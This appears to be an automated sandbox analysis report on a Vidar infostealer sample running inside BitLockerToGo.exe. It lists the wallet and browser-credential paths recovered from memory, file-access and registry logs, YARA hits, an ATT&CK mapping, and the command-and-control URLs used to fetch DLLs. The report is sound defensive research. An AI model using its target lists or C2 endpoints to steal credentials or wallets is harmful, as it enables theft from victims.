Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                      Source: Yara matchFile source: 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 2736, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 1.2.BitLockerToGo.exe.2750000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.227a000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.2418000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.23ca000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.23ca000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.227a000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.2418000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.BitLockerToGo.exe.2750000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1843071659.0000000002418000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1842034533.00000000021D6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1843071659.000000000227A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1843071659.00000000023CA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 2736, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 2736, type: MEMORYSTR
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C9E0C40 sqlite3_bind_zeroblob,1_2_6C9E0C40
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C9E0D60 sqlite3_bind_parameter_name,1_2_6C9E0D60
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C908EA0 sqlite3_clear_bindings,1_2_6C908EA0
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                      Native API
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      11
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      12
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts2
                      Command and Scripting Interpreter
                      Boot or Logon Initialization Scripts411
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      LSASS Memory1
                      Account Discovery
                      Remote Desktop Protocol4
                      Data from Local System
                      2
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
                      Obfuscated Files or Information
                      Security Account Manager2
                      File and Directory Discovery
                      SMB/Windows Admin Shares1
                      Screen Capture
                      2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      DLL Side-Loading
                      NTDS144
                      System Information Discovery
                      Distributed Component Object Model1
                      Email Collection
                      112
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Masquerading
                      LSA Secrets21
                      Security Software Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Virtualization/Sandbox Evasion
                      Cached Domain Credentials1
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items411
                      Process Injection
                      DCSync12
                      Process Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                      System Owner/User Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe53%ReversingLabsWin32.Spyware.Vidar
                      5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe55%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      C:\ProgramData\freebl3.dll0%ReversingLabs
                      C:\ProgramData\mozglue.dll0%ReversingLabs
                      C:\ProgramData\msvcp140.dll0%ReversingLabs
                      C:\ProgramData\nss3.dll0%ReversingLabs
                      C:\ProgramData\softokn3.dll0%ReversingLabs
                      C:\ProgramData\vcruntime140.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll0%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                      https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF0%URL Reputationsafe
                      https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                      https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%URL Reputationsafe
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                      http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                      https://mozilla.org0/0%URL Reputationsafe
                      https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0%URL Reputationsafe
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                      https://www.ecosia.org/newtab/0%URL Reputationsafe
                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                      https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
                      https://support.mozilla.org0%URL Reputationsafe
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      http://147.45.44.221/3538548809da56b2/msvcp140.dlltrue
                        unknown
                        http://147.45.44.221/3538548809da56b2/vcruntime140.dlltrue
                          unknown
                          http://147.45.44.221/3538548809da56b2/mozglue.dlltrue
                            unknown
                            http://147.45.44.221/3538548809da56b2/sqlite3.dlltrue
                              unknown
                              http://147.45.44.221/28166bd28a5d19e6.phptrue
                                unknown
                                http://147.45.44.221/true
                                  unknown
                                  http://147.45.44.221/3538548809da56b2/nss3.dlltrue
                                    unknown
                                    http://147.45.44.221/3538548809da56b2/softokn3.dlltrue
                                      unknown
                                      http://147.45.44.221/3538548809da56b2/freebl3.dlltrue
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://doi.org/GTB5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exefalse
                                          unknown
                                          https://duckduckgo.com/chrome_newtabJEBFIIIE.1.drfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFKEHDBAEGIIIEBGCAAFHIDHDBFB.1.drfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIFBitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpfalse
                                            unknown
                                            https://duckduckgo.com/ac/?q=BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, JEBFIIIE.1.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://147.45.44.221/28166bd28a5d19e6.phpDBitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://147.45.44.221/28166bd28a5d19e6.php;BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, JEBFIIIE.1.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://147.45.44.221bBitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1913485231.0000000022B61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://147.45.44.221/28166bd28a5d19e6.phpition:BitLockerToGo.exe, 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://147.45.44.221/28166bd28a5d19e6.phpwserBitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://147.45.44.221KEBFBBitLockerToGo.exe, 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://147.45.44.221/28166bd28a5d19e6.php#BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://147.45.44.221/3538548809da56b2/vcruntime140.dllWBitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://ramensoftware.com/05ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exefalse
                                                              unknown
                                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiGHDHJEBFBFHJECAKFCAA.1.drfalse
                                                                unknown
                                                                http://147.45.44.221/cBitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://147.45.44.221/28166bd28a5d19e6.phplaBitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, JEBFIIIE.1.drfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://147.45.44.221BitLockerToGo.exe, 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      unknown
                                                                      http://147.45.44.221/3538548809da56b2/mozglue.dll8BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.drfalse
                                                                          unknown
                                                                          http://www.sqlite.org/copyright.html.BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084293154.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17ateBitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://www.mozilla.com/en-US/blocklist/BitLockerToGo.exe, BitLockerToGo.exe, 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.drfalse
                                                                              unknown
                                                                              https://mozilla.org0/nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nYBitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgBitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.drfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoJEBFIIIE.1.drfalse
                                                                                  unknown
                                                                                  http://147.45.44.221/3538548809da56b2/vcruntime140.dll6BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkVBitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, JEBFIIIE.1.drfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaBitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.drfalse
                                                                                        unknown
